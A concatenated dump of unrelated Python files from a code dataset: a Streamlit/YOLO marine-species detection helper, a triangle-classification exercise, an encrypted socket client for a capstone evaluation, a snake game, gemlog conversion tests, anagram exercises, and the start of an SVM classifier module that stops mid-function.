diameter\n diameter = 2 * np.sqrt(result / np.pi)\n diameter_list.append(diameter)\n elif st.session_state.drop_quadrat == \"Percentage\":\n #Just percentage, no diameter\n result = np.sum(new_images[idx] != 255) / (new_images[idx].size) * 100\n result_list.append(result)\n # Append values to respective lists\n index_list.append(idx)\n class_id_list.append(st.session_state.class_list[class_id])\n confidence_list.append(confidence)\n #Add any boxes from manual annotator\n for idx, box in enumerate(new_boxes):\n if box not in detected_boxes:\n if detect_type == \"Objects + Segmentation\":\n result_list.append(0)\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n diameter_list.append(0)\n #This is a new box\n index_list.append(idx)\n class_id_list.append(st.session_state.class_list[st.session_state['result_dict'][st.session_state.image_name]['labels'][idx]])\n confidence_list.append(1)\n # select_list.append(True)\n\n # Create DataFrame\n if detect_type == \"Objects + Segmentation\":\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n data = {\n 'Index': index_list,\n 'class_id': class_id_list,\n 'Area (cm^2)': result_list,\n 'Diameter (cm)': diameter_list,\n 'Confidence': confidence_list\n }\n elif st.session_state.drop_quadrat == \"Percentage\":\n data = {\n 'Index': index_list,\n 'class_id': class_id_list,\n 'Coverage (%)': result_list,\n 'Confidence': confidence_list\n }\n else:\n data = {\n 'Index': index_list,\n 'class_id': class_id_list,\n 'Confidence': confidence_list\n }\n\n df = pd.DataFrame(data)\n\n # Set class_id as the index\n df.set_index('class_id', inplace=True)\n\n st.write(\"Image Detection Results\")\n if detect_type == \"Objects + Segmentation\":\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n edited_df = st.data_editor(df, disabled=[\"Index\", \"class_id\", \"Area (cm^2)\", \"Diameter (cm)\", 
\"Confidence\"])\n else:\n edited_df = st.data_editor(df, disabled=[\"Index\", \"class_id\", \"Coverage (%)\", \"Confidence\"])\n else:\n edited_df = st.data_editor(df, disabled=[\"Index\", \"class_id\", \"Confidence\"])\n \n #Manual Substrate Selection\n substrate = substrate_selection()\n\n #Making the dataframe for an excel sheet\n excel = {}\n excel['Image'] = st.session_state.image_name\n for cl in st.session_state.class_list:\n col1 = f\"(#) \" + cl\n excel[col1] = 0\n if detect_type == \"Objects + Segmentation\":\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n col2 = f\"Total \" + cl + f\" Area (cm^2) \" \n col3 = f\"Average \" + cl + f\" Diameter (cm)\"\n excel[col2] = 0.00\n excel[col3] = 0.00\n else:\n col2 = cl + f\" Coverage(%)\" \n excel[col2] = 0.00\n \n \n excel['Substrate'] = substrate\n dfex = pd.DataFrame(excel, index=[st.session_state.image_name])\n\n #Put data into the excel dataframe\n for index, row in edited_df.iterrows():\n #Only add data if row is selected\n id = index\n class_num = f\"(#) \" + id\n #Increment number of class\n dfex.loc[st.session_state.image_name, class_num] += 1\n if detect_type == \"Objects + Segmentation\":\n if st.session_state.drop_quadrat == \"Area (Drop Quadrat)\":\n coverage = row['Area (cm^2)']\n class_per = f\"Total \" + id + f\" Area (cm^2) \" \n #Add to total coverage\n dfex.loc[st.session_state.image_name, class_per] += coverage\n\n #Get Average diameter - Take previous average, and use:\n # avg_new = ((n-1)*avg_old + d_new)/n\n class_diameter = f\"Average \" + id + f\" Diameter (cm)\"\n d_new = row['Diameter (cm)']\n avg_old = dfex.loc[st.session_state.image_name, class_diameter]\n n = dfex.loc[st.session_state.image_name, class_num]\n avg_new = ((n-1)*avg_old + d_new)/n\n dfex.loc[st.session_state.image_name, class_diameter] = avg_new\n else:\n coverage = row['Coverage (%)']\n class_per = id + f\" Coverage(%)\" \n #Add to total coverage\n dfex.loc[st.session_state.image_name, class_per] += coverage\n\n #Return Excel Dataframe\n return dfex\n\ndef add_to_list(data, _image):\n if st.session_state.list is not None:\n #Check for duplicates\n for index, row in st.session_state.list.iterrows():\n if row['Image'] == data['Image'][0]:\n st.session_state.list= st.session_state.list.drop(index)\n\n frames = [st.session_state.list, data]\n st.session_state.list = pd.concat(frames)\n else:\n st.session_state.list = data\n st.session_state.add_to_list = True\n\n #Save the detected image result\n image_path = Path(settings.RESULTS_DIR, st.session_state.image_name)\n #Make a new image with the manual annotations\n saved_image = np.array(_image.copy())\n new_boxes = np.floor(np.array([[b[0], b[1], b[2]+b[0], b[3]+b[1]] for b in st.session_state['result_dict'][st.session_state.image_name]['bboxes']]))\n labels = st.session_state['result_dict'][st.session_state.image_name]['labels']\n for idx, box in enumerate(new_boxes):\n saved_image = cv2.rectangle(saved_image, (int(box[0]), int(box[1])), (int(box[2]), int(box[3])), settings.COLOR_LIST[labels[idx]], 3)\n cv2.imwrite(str(image_path), cv2.cvtColor(saved_image, cv2.COLOR_RGB2BGR))\n #Make the data dump text file here as well\n dump_data()\n\ndef add_to_listv(data):\n if st.session_state.list is not None:\n\n frames = [st.session_state.list, data]\n st.session_state.list = pd.concat(frames)\n else:\n st.session_state.list = data\n st.session_state.add_to_list = True\n\ndef clear_image_list():\n st.session_state.list = None\n st.session_state.add_to_list = False\n 
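    # (Editor's added note) Resetting the cached class labels and purging the results\n    # folders below keeps stale detections from leaking into the next session.\n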
st.session_state.class_list = []\n clear_folder(settings.RESULTS_DIR)\n clear_folder(settings.VIDEO_RES)\n st.experimental_rerun()\n\ndef substrate_selection():\n data_df = pd.DataFrame(\n {\n \"Substrate\":[\n \"Sandy\",\n ],\n }\n )\n res = st.data_editor(\n data_df,\n column_config={\n \"Substrate\": st.column_config.SelectboxColumn(\n \"Substrate\",\n help = \"Manual Substrate Selection\",\n width = \"medium\",\n options = [\n \"Sandy\",\n \"Mixed\",\n \"Rocky\",\n ],\n )\n },\n hide_index = True,\n )\n return res.loc[0][\"Substrate\"]\n\ndef zip_images():\n if not os.path.exists('Detected_Images'):\n os.mkdir('Detected_Images')\n\n if os.path.exists(\"Detected_Images/Detection_Images.zip\"):\n os.remove(\"Detected_Images/Detection_Images.zip\")\n file_paths = get_all_file_paths(\"Detected_Images\")\n with zipfile.ZipFile('Detected_Images/Detection_Images.zip', 'w') as img_zip:\n for file in file_paths:\n img_zip.write(file)\n with open(\"Detected_Images/Detection_Images.zip\", 'rb') as fp:\n st.download_button( label = \"Download Images\",\n help = \"Download detection result images\",\n data = fp,\n file_name = \"Detection_Images.zip\",\n mime='text/zip')\n\ndef zip_video():\n if not os.path.exists('Detected_Videos'):\n os.mkdir('Detected_Videos')\n\n if os.path.exists(\"Detected_Videos/Detected_Videos.zip\"):\n os.remove(\"Detected_Videos/Detected_Videos.zip\")\n file_paths = get_all_file_paths(\"Detected_Videos\")\n with zipfile.ZipFile('Detected_Videos/Detected_Videos.zip', 'w') as img_zip:\n for file in file_paths:\n img_zip.write(file)\n with open(\"Detected_Videos/Detected_Videos.zip\", 'rb') as fp:\n st.download_button( label = \"Download Video\",\n help = \"Download detection result videos\",\n data = fp,\n file_name = \"Detected_Video.zip\",\n mime='text/zip')\n\ndef get_all_file_paths(directory):\n # initializing empty file paths list\n file_paths = []\n \n # crawling through directory and subdirectories\n for root, directories, files in os.walk(directory):\n for filename in files:\n # join the two strings in order to form the full filepath.\n filepath = os.path.join(root, filename)\n file_paths.append(filepath)\n \n # returning all file paths\n return file_paths \n\n\ndef interactive_detections():\n #Grab the list of classes for this detection\n label_list = st.session_state.class_list + list(st.session_state.results[2].values())\n if st.session_state.manual_class != \"\":\n label_list += [st.session_state.manual_class]\n #Remove duplicates\n label_list = list(dict.fromkeys(label_list))\n st.session_state.class_list = label_list\n\n bboxes = []\n labels = []\n\n if 'result_dict' not in st.session_state:\n result_dict = {}\n st.session_state['result_dict'] = result_dict.copy()\n if st.session_state.image_name not in st.session_state.result_dict:\n st.session_state['result_dict'][st.session_state.image_name] = {'bboxes': bboxes,'labels':labels}\n\n #This is the first run, take the results from the initial detection\n if st.session_state['predicted'] == False:\n for box in st.session_state.results[0]:\n width = box[2] - box[0]\n height = box[3] - box[1]\n bboxes.append([box[0], box[1], width, height])\n for detections in st.session_state.results[1]:\n labels.append(int(detections[3])) \n st.session_state['result_dict'][st.session_state.image_name] = {'bboxes': bboxes,'labels':labels}\n else:\n bboxes = st.session_state['result_dict'][st.session_state.image_name]['bboxes']\n labels = st.session_state['result_dict'][st.session_state.image_name]['labels']\n\n target_image_path = 
Path(settings.IMAGES_DIR , st.session_state.image_name)\n new_labels = detection(image_path=target_image_path, \n bboxes=bboxes, \n labels=labels, \n label_list=label_list, \n height = 1080,\n width = 1920)\n if new_labels is not None:\n st.session_state['result_dict'][st.session_state.image_name]['labels'] = [v['label_id'] for v in new_labels]\n st.session_state['result_dict'][st.session_state.image_name]['bboxes'] = [v['bbox'] for v in new_labels]\n return True\n else:\n return False\n\n\ndef load_model(model_path):\n model = YOLO(model_path)\n return model\n\ndef dump_data():\n #Text files are normalized center point, normalized width/height\n #index x y w h \n if not os.path.exists('Dump'):\n os.mkdir('Dump')\n # boxes, _, classes, labels, _ = st.session_state.results\n boxes = np.array([[b[0], b[1], b[2]+b[0], b[3]+b[1]] for b in st.session_state['result_dict'][st.session_state.image_name]['bboxes']])\n h, w, x = st.session_state.results[4].shape\n file_name = \"Dump/\" + st.session_state.image_name[:-3] + \"txt\"\n with open(file_name, 'a') as f:\n for idx, box in enumerate(boxes):\n wn = float(box[2]-box[0]) / w\n hn = float(box[3] - box[1]) / h\n x1n = float(box[0] + float(box[2]-box[0])/2) / w\n y1n = float(box[1] + float(box[3] - box[1])/2) / h\n cl = st.session_state['result_dict'][st.session_state.image_name]['labels'][idx]\n text_str = f'{cl} {x1n:.3f} {y1n:.3f} {wn:.3f} {hn:.3f} \\n'\n f.write(text_str)\n\n\ndef dump_data_button():\n if os.path.exists(\"Dump/data.yaml\"):\n os.remove(\"Dump/data.yaml\") \n #Make the YAML file\n classes = st.session_state.results[2]\n str1 = f'nc: {len(classes)}\\n'\n str2 = f\"names: [\"\n for name in classes.values():\n str2 += f\"'{name}', \"\n str2 = str2[:-2] + \"]\"\n with open(\"Dump/data.yaml\", 'w') as fp:\n fp.write(str1)\n fp.write(str2)\n\n #Zip the Data\n if os.path.exists(\"Dump/Detection_Data.zip\"):\n os.remove(\"Dump/Detection_Data.zip\")\n file_paths = get_all_file_paths(\"Dump\")\n with zipfile.ZipFile('Dump/Detection_Data.zip', 'w') as img_zip:\n for file in file_paths:\n img_zip.write(file)\n with open(\"Dump/Detection_Data.zip\", 'rb') as fp:\n st.download_button( label = \"Detection Data Dump\",\n help = \"Dump all YOLO Detection data, which can be used to train future models.\",\n data = fp,\n file_name = \"Detection_Data.zip\",\n mime='text/zip')\n\n return\ndef display_tracker_options():\n return True, \"bytetrack.yaml\"\n # display_tracker = st.radio(\"Display Tracker\", ('Yes', 'No'))\n # is_display_tracker = True if display_tracker == 'Yes' else False\n # if is_display_tracker:\n # tracker_type = st.radio(\"Tracker\", (\"bytetrack.yaml\", \"botsort.yaml\"))\n # return is_display_tracker, tracker_type\n # return is_display_tracker, None\n\ndef preview_video_upload(video_name,data):\n with open(video_name, 'wb') as video_file:\n video_file.write(data)\n \n with open(video_name, 'rb') as video_file:\n video_bytes = video_file.read()\n if video_bytes:\n st.video(video_bytes)\n return video_name\n\ndef preview_finished_capture(video_name):\n if os.path.exists(video_name):\n with open(video_name, 'rb') as video_file:\n video_bytes = video_file.read()\n if video_bytes:\n st.video(video_bytes)\n\ndef format_video_results(model, video_name):\n video_results = st.session_state.video_data\n st.session_state.image_name = os.path.basename(video_name)\n # Initialize empty lists to store data\n index_list = []\n class_id_list = []\n count_list = []\n select_list = []\n\t\n\t# [0, 132, 1, 0] {0: 'Sea Cucumber', 1: 'Sea Urchin', 2: 
'Starfish', 3: 'Starfish-5'}\n for idx in range(len(video_results)):\n select = True\n index_list.append(idx+1)\n class_id_list.append(model.names[idx])\n count_list.append(video_results[idx])\n select_list.append(select)\n\t\t\n data = {\n 'Index': index_list,\n 'class_id': class_id_list,\n 'Count': count_list,\n 'Select': select_list\n }\n df = pd.DataFrame(data)\n\n # Set class_id as the index\n df.set_index('Index', inplace=True)\n\n st.write(\"Video Tracking Results\")\n edited_df = st.data_editor(df, disabled=[\"Index\", \"class_id\", \"Count\"])\n \n excel = {}\n excel['Video'] = st.session_state.image_name\n for name in model.names:\n col1 = f\"{model.names[name]}\"\n excel[col1] = f\"{video_results[name]}\"\n \n dfex = pd.DataFrame(excel, index=[st.session_state.image_name])\n\n return dfex\n\ndef capture_uploaded_video(conf, model, fps, source_vid, destination_path):\n \"\"\"\n Plays a stored video file. Tracks and detects objects in real-time using the YOLOv8 object detection model.\n\n Parameters:\n conf: Confidence of YOLOv8 model.\n model: An instance of the `YOLOv8` class containing the YOLOv8 model.\n fps: Frame rate to sample the input video at.\n source_path: Path/input.[MP4,MPEG]\n destinantion_path: Path/output.[MP4,MPEG]\n\n Returns:\n None\n\n Raises:\n None\n \"\"\"\n with st.spinner(\"Processing Video Capture...\"):\n _, tracker = display_tracker_options()\n\n if st.sidebar.button('Detect Video Objects'):\n try:\n vid_cap = ffmpegcv.VideoCapture(source_vid)\n video_out = ffmpegcv.VideoWriter(destination_path, 'h264', vid_cap.fps*fps)\n if video_out is None:\n raise Exception(\"Error creating VideoWriter\")\n Species_Counter = [0 for n in model.names]\n Per_Counter =[0]\n frame_count = 0\n with vid_cap, video_out:\n for frame in vid_cap:\n frame_count = frame_count + 1\n results = model.track(frame, conf=conf, iou=0.2, persist=True, tracker=tracker, device=settings.DEVICE)[0]\n\n if results.boxes.id is not None:\n \n boxes = results.boxes.xyxy.cpu().numpy().astype(int)\n ids = results.boxes.id.cpu().numpy().astype(int)\n clss = results.boxes.cls.cpu().numpy().astype(int)\n\n\n for box_num in range(len(boxes)):\n \n box = boxes[box_num]\n id = ids[box_num]\n cls = clss[box_num]\n\n # use id as first array index\n # use class as second array index\n # use persistance counter as third array index\n\n\n color = (0, 255, 0)\n while id >= len(Per_Counter)-1:\n Per_Counter.append(0)\n\n Per_Counter[id] += 1\n\n if Per_Counter[id]< 10: \n color = (163, 0, 163)\n elif Per_Counter[id] == 10:\n Species_Counter[cls] += 1\n color = (255, 0, 255)\n\n\n cv2.rectangle(frame, (box[0], box[1]), (box[2], box[3]), color, 2)\n cv2.putText(\n frame,\n f\" Id:{id}\",# Class:{cls}; Conf:{round(conf,2)} \",\n (box[0], box[1]),\n cv2.FONT_HERSHEY_SIMPLEX,\n 2,\n color,\n 2)\n\n\n cv2.putText(\n frame,\n f\"Counter:{Species_Counter} -- Species:{model.names}\",\n (40,100),\n cv2.FONT_HERSHEY_SIMPLEX,\n 1,\n (0, 255, 255),\n 4) \n video_out.write(frame)\n vid_cap.release()\n video_out.release()\n if os.path.exists(destination_path):\n print(\"Capture Done. 
\" + str(Species_Counter) + ' ' + str(model.names) )\n st.session_state.video_data = Species_Counter\n return True\n except Exception as e:\n import traceback\n st.sidebar.error(\"Error loading video: \" + str(e))\n traceback.print_exc()\n return False\n","repo_name":"JakeFriesen/Spectral_Detection","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":27078,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"10687519440","text":"while True:\n side = sorted(list(map(int, input().split())))\n if sum(side) == 0:\n break\n elif side[2] >= side[1] + side[0]:\n print('Invalid')\n elif side[0] == side[1] == side[2]:\n print('Equilateral')\n elif side[0] == side[1] or side[1] == side[2] or side[0] == side[2]:\n print('Isosceles')\n else:\n print('Scalene')\n","repo_name":"jongpark1234/Baekjoon","sub_path":"05000/baekjoon_5073.py","file_name":"baekjoon_5073.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"17178058910","text":"# Evaluation Client script on Ultra96 to send data over to Evaluation Server\n\nimport sys\nimport socket\nimport base64\nimport time\nimport random\nimport threading\n\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\nBLOCK_SIZE = 16\nPADDING = ' '\n\n# Week 13 test: 8 moves, so 33 in total = (8*4) + 1 (logout)\n#ACTIONS = ['mermaid', 'jamesbond', 'dab', 'window360', 'cowboy', 'scarecrow', 'pushback', 'snake']\n# Week 9 and 11 tests: 3 moves, repeated 4 times each = 12 moves.\n\nclass Client(threading.Thread):\n def __init__(self, ip_addr, port_num, group_id, secret_key):\n super(Client, self).__init__()\n\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_address = (ip_addr, port_num)\n self.secret_key = secret_key\n self.shutdown = threading.Event()\n\n '''\n Methods for Encryption before sending evaluation server\n '''\n def add_padding(self, plain_text):\n # return plain_text + b\"\\0\" + (AES.BLOCK_SIZE - len(plain_text) % AES.BLOCK_SIZE)\n pad = lambda s: s + (BLOCK_SIZE - (len(s) % BLOCK_SIZE)) * PADDING\n padded_plain_text = pad(plain_text)\n return padded_plain_text\n\n def encrypt_message(self, position, action, syncdelay):\n plain_text = '#' + position + '|' + action + '|' + syncdelay + '|'\n #print(\"Encrypting plain_text: \", plain_text)\n padded_plain_text = self.add_padding(plain_text)\n iv = Random.new().read(AES.block_size)\n aes_key = bytes(str(self.secret_key), encoding=\"utf8\")\n cipher = AES.new(aes_key, AES.MODE_CBC, iv)\n encrypted_text = base64.b64encode(iv + cipher.encrypt(bytes(padded_plain_text, \"utf8\")))\n return encrypted_text\n\n '''\n Methods to Send and Receive Data to and from evaluation server\n '''\n def send_data(self, position, action, syncdelay):\n encrypted_text = self.encrypt_message(position, action, syncdelay)\n #print(\"Sending encrypted_text: \", encrypted_text)\n self.socket.sendall(encrypted_text)\n\n # This function will be on a Thread\n def receive_dancer_position(self):\n while not self.shutdown.is_set():\n dancer_position = self.socket.recv(1024)\n print('<==========New dancer positions==========>')\n dancer_position = dancer_position.decode(\"utf8\")\n print(f\" [Dancer position] \", dancer_position)\n \n '''\n Main Start and Stop functions\n '''\n def run(self):\n self.socket.connect(self.server_address)\n receive_thread = threading.Thread(target=self.receive_dancer_position)\n 
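        # (Editor's added note) The daemon flag set on the next line lets the process\n        # exit even if the blocking socket.recv() in receive_dancer_position never returns.\n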
receive_thread.daemon = True\n receive_thread.start()\n print(\"Evaluation client is connected!\")\n \n def stop(self):\n self.shutdown.set()\n self.socket.close()\n print('Ultra96 Client socket closed and disconnected.')\n\n\ndef main():\n if len(sys.argv) != 5:\n print('Invalid number of arguments')\n print('python eval_client.py [IP address] [Port] [groupID] [secret key]')\n sys.exit()\n\n ip_addr = sys.argv[1]\n port_num = int(sys.argv[2])\n group_id = sys.argv[3]\n secret_key = sys.argv[4]\n\n my_client = Client(ip_addr, port_num, group_id, secret_key)\n my_client.run()\n time.sleep(15)\n\n ACTIONS = ['mermaid', 'jamesbond', 'dab']\n POSITIONS = ['1 2 3', '3 2 1', '2 3 1', '3 1 2', '1 3 2', '2 1 3']\n SYNC_DELAYS = [1.23, 0.93, 1.33]\n\n count = 0\n while count < 19:\n # Send Data to Evaluation Server for Testing\n position = random.choice(POSITIONS) \n action = random.choice(ACTIONS)\n offset = min(SYNC_DELAYS) \n my_client.send_data(str(position), str(action), str(offset))\n\n # Receive Next Dancer positions from Evaluation Server\n count += 1\n time.sleep(3)\n\n my_client.stop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"CG4002-AY2122S1-B02/CG4002_Capstone","sub_path":"Comms2_External/eval_client.py","file_name":"eval_client.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"6758126149","text":"from turtle import Screen\nfrom snake import Snake\nfrom food import Food\nfrom scoreboard import Scoreboard\nimport time\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.bgcolor(\"black\") # background\nscreen.title(\"King Python\")\nscreen.tracer(0)\n\nsnake = Snake()\nfood = Food()\nscore = Scoreboard()\n\nscreen.listen()\nscreen.onkey(snake.up, \"Up\")\nscreen.onkey(snake.down, \"Down\")\nscreen.onkey(snake.left, \"Left\")\nscreen.onkey(snake.right, \"Right\")\n\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n snake.move()\n # detect collision with food\n if snake.head.distance(food) < 15:\n score.score_refresh()\n snake.extend()\n food.refresh()\n\n if snake.head.xcor() > 280 or snake.head.xcor() < -280 or snake.head.ycor() > 280 or snake.head.ycor() < -280:\n score.reset()\n snake.reset()\n\n for segment in snake.segments[1:]:\n\n if snake.head.distance(segment) < 10:\n score.reset()\n snake.reset()\n\nscreen.exitonclick()\n","repo_name":"IYI-Pantev/Python_Sandbox","sub_path":"Snake_Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"17644618024","text":"import numpy as np\nimport pytest\nimport gemlog\nimport obspy\nimport sys\nimport os\nimport shutil\nfrom gemlog import gem_cat, convert\nfrom gemlog.core import *\nfrom gemlog.core import _convert_one_file\n\ndef setup_module():\n try:\n shutil.rmtree('tmp') # might fail if the directory doesn't exist\n except:\n pass\n os.makedirs('tmp')\n os.makedirs('tmp/raw_merged')\n os.makedirs('tmp/converted')\n os.chdir('tmp')\n print(os.getcwd())\n \ndef teardown_module():\n os.chdir('..')\n shutil.rmtree('tmp')\n\ndef test_demo_gem_cat():\n ## following is drawn as directly as possible from demo/README.md\n gem_cat('../demo_missing_gps/raw_missing_gps/', './raw_merged', '077')\n convert(rawpath = './raw_merged', convertedpath = './converted', SN = '077')\n st = obspy.read('./converted/*')\n st_ref = 
obspy.read('../demo_missing_gps/converted_with_gps/*')\n st.merge()\n st_ref.merge()\n ## check the start and end times\n assert np.abs(st[0].stats.starttime - st_ref[0].stats.starttime) < 1\n assert np.abs(st[0].stats.endtime - st_ref[0].stats.endtime) < 1\n ## check the number of points\n assert np.abs(st[0].stats.npts - st_ref[0].stats.npts) < 10\n ## check the amplitudes\n assert np.abs(np.std(st[0].data)/np.std(st_ref[0].data) - 1) < 0.05\n \n#test_demo_missing_gps()\n\n\n## check that gemconvert_single handles potential file problems correctly\ndef test_demo_gemconvert_single():\n with pytest.raises(MissingRawFiles):\n _convert_one_file('../demo_missing_gps/raw_missing_gps/FILE9999.999') # does not exist\n\n with pytest.raises(CorruptRawFileNoGPS):\n _convert_one_file('../demo_missing_gps/raw_missing_gps/FILE0001.077', require_gps = True) # lacks GPS data\n\n _convert_one_file('../demo_missing_gps/raw_missing_gps/FILE0001.077', require_gps = False) # lacks GPS data\n _convert_one_file('../demo_missing_gps/raw_missing_gps/FILE0000.077', require_gps = True) # has GPS data\n\n\n","repo_name":"ajakef/gemlog","sub_path":"tests/test_integration_missing_gps.py","file_name":"test_integration_missing_gps.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"57"} +{"seq_id":"74870866737","text":"def anagram(s):\n if len(s) %2 != 0:\n return -1\n \n a = [*s[:len(s)//2]]\n b = [*s[len(s)//2:]]\n c = 0\n for i in a:\n if i not in b:\n c += 1\n else:\n b.remove(i) \n return c\n\n# print(anagram('xyyx'))\n\ndef makingAnagrams(s1, s2):\n s1 = list(s1)\n s2 = list(s2)\n i = 0\n while i < len(s1):\n if s1[i] in s2:\n s2.remove(s1[i])\n s1.remove(s1[i])\n continue\n i += 1\n return len(s1) + len(s2)\n\n# print(makingAnagrams('abc', 'amnop'))","repo_name":"BB-Simon/Python-all-you-need-to-know","sub_path":"problem-solving/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"11557524551","text":"# SUPPORT VECTOR MACHINE\n#\n# This file contains the functions needed to train and test different flavours of SVM classifiers, specifically\n# a linear SVM and two kernel-based SVM (polynomial and gaussian radial basis). For sake of simplicity and\n# re-usability a unique function (train_SVM) has been implemented for all three cases. The models are tested\n# using differently pre-processed data, exploiting the k-fold cross validation technique to have a better insight\n# on the performances of the models. The k-fold allowed to cross-validate different parameters used in the SVMs to\n# understand which one performed better. 
The minimum DCF function is used to compare the classifiers performances.\n\nimport numpy as np\nimport scipy\nfrom utility import vrow, vcol\nfrom load_data import load\nfrom preprocessing import Z_score\nfrom DCF import compute_min_DCF\nimport matplotlib.pyplot as plt\n\n\n# Definition of the polynomial kernel -> (x1 * x2 + c) ^ d + bias\n# args is a list composed of 3 elements containing c, d and bias\ndef kernel_polynomial(X1, X2, args):\n # args is a list containing three entries: c, d and bias\n c = args[0]\n d = args[1]\n bias = args[2]\n return (np.dot(X1.T, X2) + c) ** d + bias\n\n\n# Definition of the Gaussian Radial Basis kernel -> e^(-gamma * ||x1 - x2||^2) + bias\n# args is a list composed of 2 elements containing gamma and bias\ndef kernel_rbf(X1, X2, args):\n # args is a list containing two entries: gamma and bias\n gamma = args[0]\n bias = args[1]\n return np.exp(- gamma * np.linalg.norm(X1 - X2) ** 2) + bias\n\n\n# Function to compute the H matrix for both linear and kernel case\ndef compute_H(X, Z, kernel_function=None, args_kernel=None):\n H = np.zeros((X.shape[1], X.shape[1]))\n\n if kernel_function is None or args_kernel is None:\n # Linear case\n H = np.dot(X.T, X)\n H = vcol(Z) * vrow(Z) * H\n else:\n # Kernel case\n for i in range(X.shape[1]):\n for j in range(X.shape[1]):\n H[i][j] = Z[i] * Z[j] * kernel_function(X[:, i], X[:, j], args_kernel)\n return H\n\n\n# Train the generic SVM. The kernel and args_kernel arguments allow to understand the type of SVM\ndef train_SVM(DTR, LTR, DTE, C, K, pi_T, balance=False, kernel=None, args_kernel=None):\n if kernel is None or args_kernel is None:\n # Modify training data to avoid additional constrain in dual problem\n x_hat = np.vstack([DTR, K * np.ones((1, DTR.shape[1]))])\n else:\n x_hat = DTR\n\n # Compute Z mapping Ht -> 1 and Hf -> -1\n Z = 2 * LTR - 1\n\n # Compute H_hat matrix (modified version of H matrix avoiding addition constrain)\n H_hat = compute_H(x_hat, Z, kernel, args_kernel)\n\n # Dual problem function: compute function and gradient for numerical solver\n def JDual(alpha):\n Ha = np.dot(H_hat, vcol(alpha))\n aHa = np.dot(vrow(alpha), Ha)\n a1 = alpha.sum()\n return -0.5 * aHa.ravel() + a1, - Ha.ravel() + np.ones(alpha.size)\n\n # Define the L function for dual case as negative of it -> in this way we can minimize instead of maximize\n def LDual(alpha):\n loss, grad = JDual(alpha)\n return -loss, -grad\n\n # Balance the dataset\n B = np.zeros([DTR.shape[1], 2])\n if balance:\n # Compute pi empirical as samples with label 1 over the dataset dimension\n pi_emp = sum(LTR == 1) / DTR.shape[1]\n # Compute Ct and Cf\n Ct = C * pi_T / pi_emp\n Cf = C * (1 - pi_T) / (1 - pi_emp)\n # Set different boundaries depending on labels\n B[LTR == 1, 1] = Ct\n B[LTR == 0, 1] = Cf\n else:\n B[:, 1] = C\n\n # Compute the optimal alpha\n alpha_star, _, _ = scipy.optimize.fmin_l_bfgs_b(LDual, np.zeros(DTR.shape[1]),\n approx_grad=False, bounds=B, factr=10000.0)\n\n # Compute scores\n if kernel is None or args_kernel is None:\n # Linear case\n w_star = np.dot(x_hat, vcol(alpha_star) * vcol(Z))\n # Compute extended data matrix for test dataset\n T_hat = np.concatenate((DTE, K * np.array(np.ones([1, DTE.shape[1]]))))\n # Compute score as dot product between w and extended test matrix\n S = np.dot(w_star.T, T_hat)\n else:\n # Kernel case\n kernel_mat = np.zeros([DTR.shape[1], DTE.shape[1]])\n # Compute matrix storing the dot product of the kernel function\n for index1 in range(DTR.shape[1]):\n for index2 in range(DTE.shape[1]):\n 
kernel_mat[index1, index2] = kernel(DTR[:, index1], DTE[:, index2], args_kernel)\n # Compute score\n S = np.sum((alpha_star * Z).reshape([DTR.shape[1], 1]) * kernel_mat, axis=0)\n\n return S.ravel()\n\n\n# Perform k-fold cross validation on test data for the specified model\ndef k_fold(Data, Labels, K, pi, Cfp, Cfn, C, pi_T, K_SVM, balance=False, kernel=None, args_kernel=None, seed=0):\n # Number of samples of a single fold\n fold_dim = Data.shape[1] // K\n start_idx = 0\n\n # Shuffle data\n np.random.seed(seed)\n idx = np.random.permutation(Data.shape[1])\n\n # Define array as long as the training data since with K fold all samples are used to test the model\n llr = np.zeros((Data.shape[1],))\n\n for i in range(K):\n # Define the end of the test fold\n # Manage the case last fold is smaller than the others\n if start_idx + fold_dim > Data.shape[1]:\n end_idx = Data.shape[1]\n else:\n end_idx = start_idx + fold_dim\n\n # Define index of train as everything outside (start_index, end_idx)\n idxTrain = np.concatenate((idx[0:start_idx], idx[end_idx:]))\n idxTest = idx[start_idx:end_idx]\n\n # Define train samples and labels\n DTR = Data[:, idxTrain]\n LTR = Labels[idxTrain]\n\n # Define test samples\n DTE = Data[:, idxTest]\n\n # Train the classifier and compute llr on the current partition\n llr[idxTest] = train_SVM(DTR, LTR, DTE, C, K_SVM, pi_T, balance, kernel, args_kernel)\n\n # Update fold index\n start_idx += fold_dim\n\n # Compute minimum DCF\n minDCF, _ = compute_min_DCF(llr, Labels, pi, Cfn, Cfp)\n\n return minDCF, llr\n\n\nif __name__ == '__main__':\n # Load data\n D, L = load(\"../Data/Train.txt\")\n DN = Z_score(D)\n DG = np.load(\"../Data/gaus_data/gaus_train.npy\")\n\n # Define parameters\n pi_T = 0.5\n pi = 0.5\n Cfn = 1\n Cfp = 1\n k = 5\n K_SVM = 1\n C_val = [1e-1, 1, 10]\n\n # Linear\n fileName = \"../Results/linear_SVM_results.txt\"\n with open(fileName, \"w\") as f_in:\n f_in.write(\"C Values:\\n1e-2 \\t1e-1 \\t1 \\t10 \\t100 \\n\")\n for balance in [False, True]:\n f_in.write(\"\\n\\nBalanced: \" + str(balance) + \"\\n\")\n f_in.write(\"\\nRAW\\n\")\n dcf_raw = list()\n 